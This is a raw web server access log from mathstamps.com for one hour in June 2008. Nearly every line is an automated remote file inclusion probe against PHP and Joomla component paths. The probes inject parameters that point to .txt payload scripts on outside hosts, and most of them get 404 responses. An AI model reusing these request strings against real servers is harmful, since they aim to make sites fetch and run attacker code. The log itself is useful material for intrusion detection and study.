74.52.231.162 - - [29/Jun/2008:17:00:16 -0700] "GET /logs/access_080310.log//include/write.php?dir=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.52.231.162 - - [29/Jun/2008:17:00:16 -0700] "GET //include/write.php?dir=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.52.231.162 - - [29/Jun/2008:17:00:21 -0700] "GET /logs//include/write.php?dir=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
202.221.143.111 - - [29/Jun/2008:17:02:15 -0700] "GET /logs/access_080407.log//includes/header.php?c_temp_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.221.143.111 - - [29/Jun/2008:17:02:15 -0700] "GET //includes/header.php?c_temp_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.221.143.111 - - [29/Jun/2008:17:02:16 -0700] "GET /logs//includes/header.php?c_temp_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
89.108.66.182 - - [29/Jun/2008:17:05:53 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.66.182 - - [29/Jun/2008:17:05:55 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.99.164.170 - - [29/Jun/2008:17:10:41 -0700] "GET /logs/access_080602.log//phpraider/authentication/phpbb3/phpbb3.functions.php?http://www.amc-music.de/contenido//contenido/includes/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.99.164.170 - - [29/Jun/2008:17:10:41 -0700] "GET //phpraider/authentication/phpbb3/phpbb3.functions.php?http://www.amc-music.de/contenido//contenido/includes/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.99.164.170 - - [29/Jun/2008:17:10:41 -0700] "GET /logs//phpraider/authentication/phpbb3/phpbb3.functions.php?http://www.amc-music.de/contenido//contenido/includes/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
88.191.75.245 - - [29/Jun/2008:17:11:54 -0700] "GET /logs/access_080526.log//init_basic.php?GALLERY_BASEDIR=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
88.191.75.245 - - [29/Jun/2008:17:11:55 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
88.191.75.245 - - [29/Jun/2008:17:11:55 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.66.182 - - [29/Jun/2008:17:12:56 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.66.182 - - [29/Jun/2008:17:13:03 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.13.139.103 - - [29/Jun/2008:17:13:22 -0700] "GET /logs/access_080526.log//init_basic.php?GALLERY_BASEDIR=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.13.139.103 - - [29/Jun/2008:17:13:22 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.13.139.103 - - [29/Jun/2008:17:13:23 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:17:14:57 -0700] "GET /logs/access_080609.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:17:14:57 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:17:14:58 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
201.130.79.28 - - [29/Jun/2008:17:15:00 -0700] "GET /logs/access_080609.log//config/dbutil.bck.php?confdir=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
201.130.79.28 - - [29/Jun/2008:17:15:00 -0700] "GET //config/dbutil.bck.php?confdir=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
201.130.79.28 - - [29/Jun/2008:17:15:00 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
89.188.110.30 - - [29/Jun/2008:17:15:33 -0700] "GET /logs/access_080526.log//init_basic.php?GALLERY_BASEDIR=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.188.110.30 - - [29/Jun/2008:17:15:34 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.188.110.30 - - [29/Jun/2008:17:15:34 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.99.164.170 - - [29/Jun/2008:17:16:48 -0700] "GET /logs/access_080602.log//phpraider/authentication/phpbb3/phpbb3.functions.php=http://www.amc-music.de/contenido//contenido/includes/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.99.164.170 - - [29/Jun/2008:17:16:48 -0700] "GET //phpraider/authentication/phpbb3/phpbb3.functions.php=http://www.amc-music.de/contenido//contenido/includes/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.99.164.170 - - [29/Jun/2008:17:16:48 -0700] "GET /logs//phpraider/authentication/phpbb3/phpbb3.functions.php=http://www.amc-music.de/contenido//contenido/includes/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
201.130.79.28 - - [29/Jun/2008:17:16:55 -0700] "GET /logs/access_080519.log//config/dbutil.bck.php?confdir=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
189.19.255.240 - - [29/Jun/2008:17:17:10 -0700] "GET /default.php?page=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.188.110.30 - - [29/Jun/2008:17:19:18 -0700] "GET /logs/access_080609.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.188.110.30 - - [29/Jun/2008:17:19:18 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.188.110.30 - - [29/Jun/2008:17:19:18 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
209.250.234.226 - - [29/Jun/2008:17:19:41 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.250.234.226 - - [29/Jun/2008:17:19:41 -0700] "GET //?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.250.234.226 - - [29/Jun/2008:17:19:41 -0700] "GET /logs//?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 200 8236 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.12.200.84 - - [29/Jun/2008:17:19:44 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
216.12.200.84 - - [29/Jun/2008:17:19:44 -0700] "GET //?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.63" "www.mathstamps.com"
216.12.200.84 - - [29/Jun/2008:17:19:44 -0700] "GET /logs//?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 8236 "-" "libwww-perl/5.63" "www.mathstamps.com"
89.108.66.182 - - [29/Jun/2008:17:19:50 -0700] "GET /logs/access_080512.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.66.182 - - [29/Jun/2008:17:19:51 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.66.182 - - [29/Jun/2008:17:19:53 -0700] "GET /logs/access_080512.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.66.182 - - [29/Jun/2008:17:19:53 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.118.97.213 - - [29/Jun/2008:17:19:56 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.118.97.213 - - [29/Jun/2008:17:19:56 -0700] "GET //?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.118.97.213 - - [29/Jun/2008:17:19:57 -0700] "GET /logs//?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 8236 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.215.105 - - [29/Jun/2008:17:20:13 -0700] "GET /logs/access_080609.log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
205.234.215.105 - - [29/Jun/2008:17:20:13 -0700] "GET //contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
205.234.215.105 - - [29/Jun/2008:17:20:13 -0700] "GET /logs//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
205.234.215.105 - - [29/Jun/2008:17:20:54 -0700] "GET /logs/access_080609.log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
205.234.215.105 - - [29/Jun/2008:17:20:54 -0700] "GET //contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
205.234.215.105 - - [29/Jun/2008:17:20:54 -0700] "GET /logs//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.221.157.210 - - [29/Jun/2008:17:21:31 -0700] "GET /logs/access_080609.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.221.157.210 - - [29/Jun/2008:17:21:32 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.221.157.210 - - [29/Jun/2008:17:21:32 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.227.142.237 - - [29/Jun/2008:17:23:00 -0700] "GET /logs/access_080512.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
85.227.142.237 - - [29/Jun/2008:17:23:00 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
85.227.142.237 - - [29/Jun/2008:17:23:01 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
205.234.215.105 - - [29/Jun/2008:17:27:49 -0700] "GET /logs/access_080505.log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
205.234.215.105 - - [29/Jun/2008:17:28:18 -0700] "GET /logs/access_080505.log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.40.144.166 - - [29/Jun/2008:17:28:21 -0700] "GET /logs/access_080421.log/errors.php?error=http://electrometro.com.ve/wall/xpl/oi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.40.144.166 - - [29/Jun/2008:17:28:21 -0700] "GET /errors.php?error=http://electrometro.com.ve/wall/xpl/oi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.40.144.166 - - [29/Jun/2008:17:28:21 -0700] "GET /logs/errors.php?error=http://electrometro.com.ve/wall/xpl/oi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
193.202.88.113 - - [29/Jun/2008:17:28:31 -0700] "GET /logs/access_080609.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
193.202.88.113 - - [29/Jun/2008:17:28:31 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
193.202.88.113 - - [29/Jun/2008:17:28:31 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.40.144.166 - - [29/Jun/2008:17:29:05 -0700] "GET /logs/access_080331.log/errors.php?error=http://electrometro.com.ve/wall/xpl/oi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
88.191.75.245 - - [29/Jun/2008:17:29:15 -0700] "GET /logs/access_080609.log//init_basic.php?GALLERY_BASEDIR=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.66.182 - - [29/Jun/2008:17:29:21 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.66.182 - - [29/Jun/2008:17:29:59 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.188.110.30 - - [29/Jun/2008:17:35:54 -0700] "GET /logs/access_080609.log//init_basic.php?GALLERY_BASEDIR=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.18.241.90 - - [29/Jun/2008:17:37:15 -0700] "GET /logs/access_080512.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.18.241.90 - - [29/Jun/2008:17:37:15 -0700] "GET //component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.18.241.90 - - [29/Jun/2008:17:37:15 -0700] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.15.205.17 - - [29/Jun/2008:17:37:25 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://loverzpoint.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.205.17 - - [29/Jun/2008:17:37:25 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://loverzpoint.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.205.17 - - [29/Jun/2008:17:37:25 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://loverzpoint.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.18.241.90 - - [29/Jun/2008:17:38:54 -0700] "GET /logs/access.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
58.147.79.83 - - [29/Jun/2008:17:39:52 -0700] "GET /logs/access_080602.log//components/com_simpleboard/file_upload.php?sbp=http://easynets.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
58.147.79.83 - - [29/Jun/2008:17:39:52 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://easynets.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
58.147.79.83 - - [29/Jun/2008:17:39:53 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://easynets.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:17:46:56 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:17:46:57 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:17:46:57 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
221.139.104.33 - - [29/Jun/2008:17:49:35 -0700] "GET /logs/access_080331.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.139.104.33 - - [29/Jun/2008:17:49:35 -0700] "GET /logs/access_080331.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.139.104.33 - - [29/Jun/2008:17:49:35 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.139.104.33 - - [29/Jun/2008:17:49:35 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.139.104.33 - - [29/Jun/2008:17:49:36 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.139.104.33 - - [29/Jun/2008:17:49:36 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
84.2.17.228 - - [29/Jun/2008:17:50:26 -0700] "GET /logs/access_080512.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.2.17.228 - - [29/Jun/2008:17:50:28 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.2.17.228 - - [29/Jun/2008:17:50:29 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.2.17.228 - - [29/Jun/2008:17:53:30 -0700] "GET /logs/access_080609.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:17:56:45 -0700] "GET /logs/access_080526.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
203.177.42.133 - - [29/Jun/2008:17:56:57 -0700] "GET /logs/access_080526.log//init_basic.php?GALLERY_BASEDIR=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.177.42.133 - - [29/Jun/2008:17:56:58 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.177.42.133 - - [29/Jun/2008:17:56:59 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
8.2.208.2 - - [29/Jun/2008:17:59:17 -0700] "GET /logs/access_080602.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
8.2.208.2 - - [29/Jun/2008:17:59:17 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
8.2.208.2 - - [29/Jun/2008:18:00:12 -0700] "GET /logs/access_080602.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
8.2.208.2 - - [29/Jun/2008:18:00:12 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
8.2.208.2 - - [29/Jun/2008:18:00:12 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
8.2.208.2 - - [29/Jun/2008:18:01:32 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
8.2.208.2 - - [29/Jun/2008:18:01:55 -0700] "GET /logs/access_080526.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
8.2.208.2 - - [29/Jun/2008:18:01:55 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
8.2.208.2 - - [29/Jun/2008:18:04:05 -0700] "GET /logs/access_080526.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
8.2.208.2 - - [29/Jun/2008:18:04:05 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
